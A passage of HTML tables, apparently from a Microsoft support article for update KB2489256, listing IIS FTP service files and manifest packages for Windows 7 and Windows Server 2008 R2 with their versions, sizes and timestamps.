class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">20:48</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpconfigext.dll</td><td class=\"sbody-td\">7.5.7601.21649</td><td class=\"sbody-td\">40,960</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:30</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpctrlps.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">22,528</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:46</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpmib.dll</td><td class=\"sbody-td\">7.5.7600.16385</td><td class=\"sbody-td\">23,552</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:46</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpres.dll</td><td class=\"sbody-td\">7.5.7600.14294</td><td class=\"sbody-td\">14,848</td><td class=\"sbody-td\">14-Jul-2009</td><td class=\"sbody-td\">01:35</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.dll</td><td class=\"sbody-td\">7.5.7601.21649</td><td class=\"sbody-td\">784,384</td><td class=\"sbody-td\">26-Jan-2011</td><td class=\"sbody-td\">05:30</td><td class=\"sbody-td\">IA-64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ftpsvc.mof</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">69,252</td><td class=\"sbody-td\">13-Jul-2009</td><td class=\"sbody-td\">20:48</td><td class=\"sbody-td\">Not Applicable</td></tr></table></div><h3 class=\"sbody-h3\">Additional file information for Windows 7 and Windows Server 2008 R2</h3><a class=\"bookmark\" id=\"manifests7\"></a><h4 class=\"sbody-h4\">Additional files for all supported x86-based versions of Windows 7</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2489256_bf~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,780</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2489256~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,692</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2489256_bf~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,745</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2489256~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,622</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2489256_bf~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,983</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2489256~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,485</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb2489256_bf~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,913</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb2489256~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,450</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_rtm_bf~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,873</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_rtm~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,910</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_sp1_bf~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,873</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2489256_sp1~31bf3856ad364e35~x86~~6.1.1.1.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,909</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,245</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">x86_1daaf41b98662d99eb7a3ded523dc5ac_31bf3856ad364e35_6.1.7601.17550_none_deca261b924302c4.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">x86_3d56d28999e8a48bccde471bcd425092_31bf3856ad364e35_6.1.7600.16748_none_d4d439bfb842ac08.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">x86_d2a0824f035b6d239ac7f36e8e5c0190_31bf3856ad364e35_6.1.7600.20888_none_467b980ac09deff2.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">x86_fccfbf773a79c1c7a982bcd793cda99e_31bf3856ad364e35_6.1.7601.21649_none_d8d48a9b91a3051f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">x86_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7600.16748_none_4a6fb4dbf6d14960.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:19</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">x86_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7600.20888_none_4ace11f7100f58ee.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:19</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">x86_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7601.17550_none_4c433fa5f4070685.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:19</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">x86_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7601.21649_none_4ce0aef70d146e6d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,009</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:19</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Additional files for all supported x64-based versions of Windows 7 and of Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_a63bcc8c1670c58184f1b6cef88de859_31bf3856ad364e35_6.1.7600.20888_none_e74927d2eb060051.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,046</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_b2ef32491384dc9349fa70c304c618c5_31bf3856ad364e35_6.1.7601.17550_none_3c3fd94ec25bc045.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,046</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_be2b18e525bc562ae2c402c7d1180790_31bf3856ad364e35_6.1.7601.21649_none_be9e0ef0459925ae.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,046</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_ce48944db4e9ca04d4b27a221e907473_31bf3856ad364e35_6.1.7600.16748_none_59f5686168fe97b0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,046</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7600.16748_none_a68e505faf2eba96.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,015</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:26</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7600.20888_none_a6ecad7ac86cca24.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,015</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">21:26</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft-windows-iis-ftpsvc_31bf3856ad364e35_6.1.7601.17550_none_a861db29ac6477bb.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">31,015</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">26-Jan-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td 